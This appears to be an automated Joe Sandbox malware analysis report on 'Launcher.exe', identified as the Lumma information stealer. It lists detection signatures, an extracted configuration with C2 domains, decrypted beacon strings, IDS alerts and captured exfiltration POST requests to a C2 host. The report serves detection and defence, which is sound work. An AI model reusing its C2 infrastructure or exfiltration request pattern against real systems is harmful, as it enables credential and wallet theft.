Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Launcher.exe

Overview

General Information

Sample name:Launcher.exe
Analysis ID:1579547
MD5:b7c46f4d20c5a3926df76e882d2babe7
SHA1:6df61219ed593a296a265a31fb6a354fa31649cd
SHA256:c38f2f4bb95bdd3b5a62b650d233d5d697fbf74d607a65b5375eeb79c8e2e2fd
Tags:exeuser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found evasive API chain (date check)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Launcher.exe (PID: 2656 cmdline: "C:\Users\user\Desktop\Launcher.exe" MD5: B7C46F4D20C5A3926DF76E882D2BABE7)
    • conhost.exe (PID: 2448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Launcher.exe (PID: 6292 cmdline: "C:\Users\user\Desktop\Launcher.exe" MD5: B7C46F4D20C5A3926DF76E882D2BABE7)
    • WerFault.exe (PID: 3480 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2656 -s 600 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["grannyejh.lat", "crosshuaht.lat", "energyaffai.lat", "rapeflowwj.lat", "aspecteirs.lat", "necklacebudi.lat", "discokeyus.lat", "sweepyribs.lat", "sustainskelet.lat"], "Build id": "yau6Na--622914791"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000003.00000003.2349716206.0000000000FF6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000003.00000003.2348231788.0000000000FF3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000003.00000003.2346332053.0000000000FF3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000003.00000003.2348803317.0000000000FF3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000003.00000003.2343011519.0000000000FF3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 12 entries
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-22T23:50:02.489769+010020283713Unknown Traffic192.168.2.54970523.55.153.106443TCP
                2024-12-22T23:50:04.998606+010020283713Unknown Traffic192.168.2.549708104.21.66.86443TCP
                2024-12-22T23:50:07.040341+010020283713Unknown Traffic192.168.2.549712104.21.66.86443TCP
                2024-12-22T23:50:09.730127+010020283713Unknown Traffic192.168.2.549713104.21.66.86443TCP
                2024-12-22T23:50:12.283390+010020283713Unknown Traffic192.168.2.549715104.21.66.86443TCP
                2024-12-22T23:50:25.800225+010020283713Unknown Traffic192.168.2.549745104.21.66.86443TCP
                2024-12-22T23:50:28.783946+010020283713Unknown Traffic192.168.2.549756104.21.66.86443TCP
                2024-12-22T23:50:31.163794+010020283713Unknown Traffic192.168.2.549762104.21.66.86443TCP
                2024-12-22T23:50:39.867758+010020283713Unknown Traffic192.168.2.549783104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-22T23:50:05.781735+010020546531A Network Trojan was detected192.168.2.549708104.21.66.86443TCP
                2024-12-22T23:50:08.103943+010020546531A Network Trojan was detected192.168.2.549712104.21.66.86443TCP
                2024-12-22T23:50:40.653165+010020546531A Network Trojan was detected192.168.2.549783104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-22T23:50:05.781735+010020498361A Network Trojan was detected192.168.2.549708104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-22T23:50:08.103943+010020498121A Network Trojan was detected192.168.2.549712104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-22T23:49:59.769175+010020583541Domain Observed Used for C2 Detected192.168.2.5625571.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-22T23:50:00.322272+010020583581Domain Observed Used for C2 Detected192.168.2.5576111.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-22T23:49:58.518570+010020583601Domain Observed Used for C2 Detected192.168.2.5581191.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-22T23:49:59.374717+010020583621Domain Observed Used for C2 Detected192.168.2.5511341.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-22T23:49:58.128956+010020583641Domain Observed Used for C2 Detected192.168.2.5573781.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-22T23:49:58.998433+010020583701Domain Observed Used for C2 Detected192.168.2.5633401.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-22T23:50:00.544562+010020583741Domain Observed Used for C2 Detected192.168.2.5610421.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-22T23:50:00.095091+010020583761Domain Observed Used for C2 Detected192.168.2.5530621.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-22T23:49:57.881651+010020583781Domain Observed Used for C2 Detected192.168.2.5600241.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-22T23:50:29.459744+010020480941Malware Command and Control Activity Detected192.168.2.549756104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-22T23:50:31.184304+010028438641A Network Trojan was detected192.168.2.549762104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-22T23:50:03.312525+010028586661Domain Observed Used for C2 Detected192.168.2.54970523.55.153.106443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 00000000.00000002.2332293012.0000000002F4D000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["grannyejh.lat", "crosshuaht.lat", "energyaffai.lat", "rapeflowwj.lat", "aspecteirs.lat", "necklacebudi.lat", "discokeyus.lat", "sweepyribs.lat", "sustainskelet.lat"], "Build id": "yau6Na--622914791"}
                Source: Launcher.exeVirustotal: Detection: 44%Perma Link
                Source: Launcher.exeReversingLabs: Detection: 39%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.0% probability
                Source: Launcher.exeJoe Sandbox ML: detected
                Source: 00000003.00000002.2482454521.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: rapeflowwj.lat
                Source: 00000003.00000002.2482454521.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: crosshuaht.lat
                Source: 00000003.00000002.2482454521.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: sustainskelet.lat
                Source: 00000003.00000002.2482454521.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: aspecteirs.lat
                Source: 00000003.00000002.2482454521.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: energyaffai.lat
                Source: 00000003.00000002.2482454521.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: necklacebudi.lat
                Source: 00000003.00000002.2482454521.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: discokeyus.lat
                Source: 00000003.00000002.2482454521.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: grannyejh.lat
                Source: 00000003.00000002.2482454521.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: sweepyribs.lat
                Source: 00000003.00000002.2482454521.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000003.00000002.2482454521.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000003.00000002.2482454521.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000003.00000002.2482454521.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000003.00000002.2482454521.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000003.00000002.2482454521.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: yau6Na--622914791
                Source: Launcher.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.5:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49712 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49715 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49745 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49756 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49762 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49783 version: TLS 1.2
                Source: Launcher.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_009E63B5 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_009E63B5
                Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_009E6304 FindFirstFileExW,0_2_009E6304

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2058362 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat) : 192.168.2.5:51134 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.5:60024 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058376 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat) : 192.168.2.5:53062 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058374 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat) : 192.168.2.5:61042 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058358 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat) : 192.168.2.5:57611 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.5:57378 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058370 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat) : 192.168.2.5:63340 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058354 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat) : 192.168.2.5:62557 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) : 192.168.2.5:58119 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49708 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49708 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49712 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49712 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49756 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49705 -> 23.55.153.106:443
                Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:49762 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49783 -> 104.21.66.86:443
                Source: Malware configuration extractorURLs: grannyejh.lat
                Source: Malware configuration extractorURLs: crosshuaht.lat
                Source: Malware configuration extractorURLs: energyaffai.lat
                Source: Malware configuration extractorURLs: rapeflowwj.lat
                Source: Malware configuration extractorURLs: aspecteirs.lat
                Source: Malware configuration extractorURLs: necklacebudi.lat
                Source: Malware configuration extractorURLs: discokeyus.lat
                Source: Malware configuration extractorURLs: sweepyribs.lat
                Source: Malware configuration extractorURLs: sustainskelet.lat
                Source: Joe Sandbox ViewIP Address: 104.21.66.86 104.21.66.86
                Source: Joe Sandbox ViewIP Address: 23.55.153.106 23.55.153.106
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 23.55.153.106:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49715 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49712 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49745 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49756 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49762 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49713 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49783 -> 104.21.66.86:443
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 51Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=CCOVNLAI1KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12791Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=FM6LQ1OGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15021Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=9VUVW43BOUI50PRNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20559Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3UJGQBBN0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1207Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=23BO8WTDUMZGFIJDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 568760Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 86Host: lev-tolstoi.com
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: global trafficDNS traffic detected: DNS query: sweepyribs.lat
                Source: global trafficDNS traffic detected: DNS query: grannyejh.lat
                Source: global trafficDNS traffic detected: DNS query: discokeyus.lat
                Source: global trafficDNS traffic detected: DNS query: necklacebudi.lat
                Source: global trafficDNS traffic detected: DNS query: energyaffai.lat
                Source: global trafficDNS traffic detected: DNS query: aspecteirs.lat
                Source: global trafficDNS traffic detected: DNS query: sustainskelet.lat
                Source: global trafficDNS traffic detected: DNS query: crosshuaht.lat
                Source: global trafficDNS traffic detected: DNS query: rapeflowwj.lat
                Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                Source: global trafficDNS traffic detected: DNS query: lev-tolstoi.com
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                Source: Launcher.exe, 00000003.00000003.2319197118.0000000003A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: Launcher.exe, 00000003.00000003.2319197118.0000000003A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: Launcher.exe, 00000003.00000003.2319197118.0000000003A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: Launcher.exe, 00000003.00000003.2319197118.0000000003A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: Launcher.exe, 00000003.00000003.2319197118.0000000003A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: Launcher.exe, 00000003.00000003.2319197118.0000000003A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: Launcher.exe, 00000003.00000003.2319197118.0000000003A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: Launcher.exe, 00000003.00000003.2319197118.0000000003A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: Launcher.exe, 00000003.00000003.2319197118.0000000003A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: Launcher.exe, 00000003.00000003.2350321053.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD4000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2346332053.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2482098262.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2348231788.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2343830924.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2349091115.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2347665217.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2343011519.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2349767095.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2183979276.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2345580376.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2158039808.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2318603921.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2373792847.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2344743144.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000002.2483176433.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2346946917.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                Source: Launcher.exe, 00000003.00000003.2350321053.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD4000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2346332053.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2482098262.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2348231788.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2343830924.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2349091115.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2347665217.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2343011519.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2349767095.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2183979276.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2345580376.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2158039808.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2318603921.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2373792847.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2344743144.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000002.2483176433.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2346946917.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
